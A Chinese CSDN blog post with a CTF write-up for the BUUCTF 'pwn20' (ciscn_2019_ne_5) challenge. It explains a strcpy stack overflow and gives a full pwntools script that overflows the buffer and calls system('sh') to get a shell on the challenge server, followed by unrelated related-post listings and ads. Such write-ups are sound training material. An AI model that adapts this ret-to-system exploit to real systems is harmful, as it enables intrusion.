buuctf pwn20

已于 2023-11-23 20:58:02 修改
阅读量47 收藏
点赞数
文章标签: 网络安全
于 2023-11-08 17:18:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/134293811
版权

ciscn_2019_ne_5 1

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
该题逻辑为先输入admin password,如果admin passaord为administrator,则从下面选一个数执行对应的程序
1.Add a log.
2.Display all logs.
3.Print all logs.
0.Exit
通过分析可知4中的GetFlag中strcpy(dest, src);存在栈溢出漏洞,而dest距离栈底有0x48个单位长度,而src可以通过进入1,就可以输入src的值,而且执行完1后(即输入完src的值后)会自动返回到puts(“Input your operation:”);处来,然后继续输入v4的值。

从3中的Print()中发现有system()的调用,反汇编查看call _system的地址为0x80484D0
使用命令ROPgadget --binary pwn20 --string '/bin/sh’尝试寻找/bin/sh的地址,但没有找到,而sh可替换/bin/sh,故再使用ROPgadget --binary pwn20 --string 'sh’发现可以寻找到sh的地址0x080482ea
故此题的攻击逻辑为先进入1输入src的值(即payload),再接着进入4就可获取shell

exp

from pwn import*
p=remote('node4.buuoj.cn',28233)
sh_addr=0x080482ea 
sys_addr=0x80486B9
p.sendlineafter('admin password:',b'administrator')
p.sendlineafter('0.Exit\n:','1')
payload=b'a'*0x4c+p32(sys_addr)+p32(sh_addr)
p.sendlineafter('log info:',payload)
p.sendlineafter('0.Exit\n:','4')
p.interactive()

在这里插入图片描述

曾经满眼皆是她
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2522
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN 1-20
2h4ox1n9
12-03 376
1、test_your_nc from pwn import * io=remote("node3.buuoj.cn",27916) io.interactive() 之后ls , cat flag 白给
buuctf pwn解题
2301_80477504的博客
02-01 483
1.
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 410
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
2024NKCTF-pwn
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8390
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于工业互联网智能工厂总体建设方案-服装类.pdf
最新发布
08-17
基于工业互联网智能工厂总体建设方案-服装类.pdf
财务主数据管理资产管理管理系-财务域.docx
08-17
财务主数据管理资产管理管理系-财务域.docx
HHO-CNN-BiLSTM-Attention哈里斯鹰算法优化多变量时间序列预测,含优化前后对比(Matlab完整源码和数据)
08-17
1.Matlab实现HHO哈里斯鹰优化算法优化CNN-BiLSTM-Attention多变量时间序列预测,含优化前后对比(Matlab完整源码和数据)优化学习率,神经元个数,注意力机制的键值, 正则化参数。 2.输出MAE 、 MAPE、MSE、RMSE、R2多指标评价,运行环境Matlab2023及以上。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:机器学习之心,博客专家认证,机器学习领域创作者,2023博客之星TOP50,主做机器学习和深度学习时序、回归、分类、聚类和降维等程序设计和案例分析,文章底部有博主联系方式。从事Matlab、Python算法仿真工作8年,更多仿真源码、数据集定制私信.
锤子便签风格待办事项工具电脑版,用户可以在电脑上体验到锤子便签的功能
08-17
锤子便签风格待办事项工具电脑版,用户可以在电脑上体验到锤子便签的功能。它不仅可以输入文字,还支持插入图片,进行图文混排。雅致的信纸、精心调整的排版,令内容更加赏心悦目。
汽车设备制造业企业信息化业务解决方案.docx
08-17
汽车设备制造业企业信息化业务解决方案.docx
毕业设计asp.net进销存管理系统-qr源码含文档工具包
08-17
毕业设计asp.net进销存管理系统-qr源码含文档工具包 asp.net,数据库sqlserver,开发工具用Microsoft Visual Studio 本系统主要分为六大模块:采购模块,销售模块,查询模块,统计模块,用户管理模块,信息管理模块。 包含:源码、数据库脚本、论文、答辩ppt、环境工具包(在说明文档中)
HFSS天线设计-李明洋
08-17
HFSS天线设计-李明洋
企业业财一体化平台蓝图规划项目建议方案.docx
08-17
企业业财一体化平台蓝图规划项目建议方案.docx
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值